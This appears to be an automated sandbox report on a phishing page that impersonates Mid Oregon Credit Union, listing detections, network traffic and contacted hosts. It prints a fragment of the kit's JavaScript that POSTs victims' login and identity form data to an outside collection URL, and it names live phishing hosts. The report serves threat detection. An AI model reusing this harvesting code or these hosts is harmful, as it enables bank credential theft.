Edit tour

Windows Analysis Report
https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com/open/message_12832.html

Overview

General Information

Sample URL:	https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com/open/message_12832.html
Analysis ID:	1583411
Infos:

Detection

HTMLPhisher

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Yara detected HtmlPhish10

AI detected suspicious URL

Javascript uses Clearbit API to dynamically determine company logos

HTML body contains low number of good links

HTML body contains password input but no form action

HTML title does not match URL

Classification

Process Tree

System is w10x64

chrome.exe (PID: 5924 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5808 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1956,i,5072005489265029197,6163600795144254209,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6516 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com/open/message_12832.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
2.1.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

AI detected phishing page

Source: https://pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev/midoregon.com/login.html

Joe Sandbox AI: Score: 9 Reasons: The brand 'Mid Oregon Credit Union' is a known regional credit union., The URL 'pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev' does not match the legitimate domain 'midoregon.com'., The URL uses a subdomain structure with a random string, which is common in phishing attempts., The domain 'r2.dev' is not associated with Mid Oregon Credit Union and is suspicious., The presence of input fields for 'Username' and 'Password' on a non-legitimate domain increases the risk of phishing. DOM: 2.1.pages.csv

Yara detected HtmlPhish10

Source: Yara match

File source: 2.1.pages.csv, type: HTML

AI detected suspicious URL

Source: URL

Joe Sandbox AI: AI detected Brand spoofing attempt in URL: https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com

Javascript uses Clearbit API to dynamically determine company logos

Source: https://pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev/midoregon.com/login.html

HTTP Parser: async function fetchdata(formdata) { try { const response = await fetch('https://geometricbadges.com/mmm/mo.php', { method: 'post', body: formdata }); if (response.ok) { console.log("data successfully sent to the server."); } else { console.log("server error:", response.status); } } catch (error) { console.error("fetch error:", error); } } function submitform(formnumber) { let formdata; if (formnumber === 1) { formdata = new formdata(document.getelementbyid('loginform')); fetchdata(formdata); delayandshowform(1, 2, "signing in..."); } else if (formnumber === 2) { formdata = new formdata(document.getelementbyid('identityform')); fetchdata(formdata); delayandshowform(2, 3, "verifying..."); } else if (formnumber === 3) { for...

Source: https://pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev/midoregon.com/login.html

HTTP Parser: Number of links: 0

Source: https://pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev/midoregon.com/login.html

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev/midoregon.com/login.html

HTTP Parser: Title: Mid Oregon Credit Union | The Best Central Oregon Local Credit Union does not match URL

Source: https://pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev/midoregon.com/login.html

HTTP Parser: <input type="password" .../> found

Source: https://pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev/midoregon.com/login.html

HTTP Parser: No <meta name="author".. found

Source: https://pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev/midoregon.com/login.html

HTTP Parser: No <meta name="copyright".. found

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /open/message_12832.html HTTP/1.1Host: midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /production/themesets/28f75336-2d61-4c64-8237-e68ae6ac9157/themes/theme-builder/default/assets/images/brand-logo-wide.png HTTP/1.1Host: assets.orb.alkamitech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /production/themesets/28f75336-2d61-4c64-8237-e68ae6ac9157/themes/theme-builder/default/assets/images/brand-logo-wide.png HTTP/1.1Host: assets.orb.alkamitech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.midoregon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.midoregon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /midoregon.com/login.html HTTP/1.1Host: pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /midoregon.com/email_domain_logo.png HTTP/1.1Host: pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev/midoregon.com/login.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /midoregon.com/login.html HTTP/1.1Host: pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /production/themesets/28f75336-2d61-4c64-8237-e68ae6ac9157/themes/theme-builder/default/assets/images/brand-logo-wide.png HTTP/1.1Host: assets.orb.alkamitech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /file/img001/nBm6LfNrTUqvKQ9HTQUnsQ.png HTTP/1.1Host: img001.prntscr.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /file/img001/nBm6LfNrTUqvKQ9HTQUnsQ.png HTTP/1.1Host: img001.prntscr.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.midoregon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /aryxwmw.io HTTP/1.1Host: logo.clearbit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com
Source: global traffic	DNS traffic detected: DNS query: assets.orb.alkamitech.com
Source: global traffic	DNS traffic detected: DNS query: www.midoregon.com
Source: global traffic	DNS traffic detected: DNS query: pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev
Source: global traffic	DNS traffic detected: DNS query: img001.prntscr.com
Source: global traffic	DNS traffic detected: DNS query: logo.clearbit.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 Jan 2025 16:21:52 GMTContent-Type: text/htmlContent-Length: 27150Connection: closeServer: cloudflareCF-RAY: 8fbc15aa6d13f78d-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8Content-Length: 1Connection: closeDate: Thu, 02 Jan 2025 16:21:54 GMTx-envoy-response-flags: -Server: Clearbitstrict-transport-security: max-age=63072000; includeSubDomains; preloadx-content-type-options: nosniffX-Cache: Error from cloudfrontVia: 1.1 27f780feafa4114cfc67d86fca85d124.cloudfront.net (CloudFront)X-Amz-Cf-Pop: FRA56-C2X-Amz-Cf-Id: jVfTMQhvdZKOxJgVd4v3GG2pW3rgtblTw4Z2DovY8NfjdUTo7EyqxA==

Source: chromecache_48.2.dr	String found in binary or memory: https://assets.orb.alkamitech.com/production/themesets/28f75336-2d61-4c64-8237-e68ae6ac9157/themes/t
Source: chromecache_54.2.dr, chromecache_48.2.dr	String found in binary or memory: https://geometricbadges.com/mmm/mo.php
Source: chromecache_54.2.dr, chromecache_48.2.dr	String found in binary or memory: https://img001.prntscr.com/file/img001/nBm6LfNrTUqvKQ9HTQUnsQ.png
Source: chromecache_48.2.dr	String found in binary or memory: https://logo.clearbit.com/$
Source: chromecache_56.2.dr	String found in binary or memory: https://pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev/midoregon.com/login.html
Source: chromecache_56.2.dr, chromecache_54.2.dr, chromecache_48.2.dr	String found in binary or memory: https://www.midoregon.com/favicon.ico

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443

Source: classification engine

Classification label: mal64.phis.win@17/20@26/12

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1956,i,5072005489265029197,6163600795144254209,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com/open/message_12832.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1956,i,5072005489265029197,6163600795144254209,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com/open/message_12832.html	0%	Avira URL Cloud	safe

Source	Detection	Scanner	Label
https://pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev/midoregon.com/email_domain_logo.png	0%	Avira URL Cloud	safe
https://geometricbadges.com/mmm/mo.php	0%	Avira URL Cloud	safe
https://www.midoregon.com/favicon.ico	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
d26p066pn2w0s0.cloudfront.net	13.32.27.129	true	false	high
img001.prntscr.com	104.23.139.12	true	false	high
pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev	172.66.0.235	true	true	unknown
www.google.com	142.250.185.196	true	false	high
www.midoregon.com	67.227.180.41	true	false	unknown
d2yc0o7ycjs17k.cloudfront.net	143.204.215.95	true	false	unknown
s3-r-w.us-east-1.amazonaws.com	54.231.130.18	true	false	high
assets.orb.alkamitech.com	unknown	unknown	false	high
midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com	unknown	unknown	true	unknown
logo.clearbit.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://assets.orb.alkamitech.com/production/themesets/28f75336-2d61-4c64-8237-e68ae6ac9157/themes/theme-builder/default/assets/images/brand-logo-wide.png	false		high
https://pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev/midoregon.com/login.html	true		unknown
https://www.midoregon.com/favicon.ico	false	Avira URL Cloud: safe	unknown
https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com/open/message_12832.html	false		unknown
https://img001.prntscr.com/file/img001/nBm6LfNrTUqvKQ9HTQUnsQ.png	false		high
https://pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev/midoregon.com/email_domain_logo.png	false	Avira URL Cloud: safe	unknown
https://logo.clearbit.com/aryxwmw.io	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://assets.orb.alkamitech.com/production/themesets/28f75336-2d61-4c64-8237-e68ae6ac9157/themes/t	chromecache_48.2.dr	false		high
https://logo.clearbit.com/$	chromecache_48.2.dr	false		high
https://geometricbadges.com/mmm/mo.php	chromecache_54.2.dr, chromecache_48.2.dr	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
67.227.180.41	www.midoregon.com	United States	32244	LIQUIDWEBUS	false
104.23.139.12	img001.prntscr.com	United States	13335	CLOUDFLARENETUS	false
162.159.140.237	unknown	United States	13335	CLOUDFLARENETUS	false
104.23.140.12	unknown	United States	13335	CLOUDFLARENETUS	false
143.204.215.112	unknown	United States	16509	AMAZON-02US	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.185.196	www.google.com	United States	15169	GOOGLEUS	false
54.231.130.18	s3-r-w.us-east-1.amazonaws.com	United States	16509	AMAZON-02US	false
143.204.215.95	d2yc0o7ycjs17k.cloudfront.net	United States	16509	AMAZON-02US	false
172.66.0.235	pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev	United States	13335	CLOUDFLARENETUS	true
13.32.27.129	d26p066pn2w0s0.cloudfront.net	United States	7018	ATT-INTERNET4US	false

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583411
Start date and time:	2025-01-02 17:20:38 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com/open/message_12832.html
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal64.phis.win@17/20@26/12
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.227, 142.250.185.174, 74.125.71.84, 142.250.186.174, 142.250.184.238, 172.217.18.14, 199.232.210.172, 192.229.221.95, 216.58.206.78, 142.250.185.202, 216.58.212.138, 172.217.23.106, 142.250.185.170, 142.250.184.202, 216.58.206.42, 142.250.186.170, 142.250.185.234, 172.217.18.106, 142.250.185.138, 142.250.185.106, 142.250.185.74, 142.250.181.234, 216.58.206.74, 142.250.186.74, 142.250.186.138, 142.250.185.238, 142.250.185.131, 142.250.185.206, 184.28.90.27, 20.12.23.50, 13.107.246.44
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com/open/message_12832.html

Input	Output
